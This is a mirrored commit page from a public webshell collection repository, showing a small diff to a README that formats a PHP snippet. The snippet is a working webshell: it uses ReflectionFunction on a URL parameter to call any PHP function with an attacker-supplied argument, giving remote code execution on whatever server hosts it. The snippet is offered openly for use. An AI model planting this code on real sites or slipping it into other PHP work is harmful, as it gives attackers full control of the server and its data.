1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-09 14:11:30 +00:00

update readme.md

This commit is contained in:
tennc
2014-07-28 10:03:18 +08:00
parent 8eb3d3e519
commit 635d59bba7

View File

@@ -7,8 +7,11 @@
code: code:
<?php <?php
<p>
$func = new ReflectionFunction($_GET[m]); $func = new ReflectionFunction($_GET[m]);
<p>
echo $func->invokeArgs(array($_GET[c])); echo $func->invokeArgs(array($_GET[c]));
<p>
?> ?>
*************************************************** ***************************************************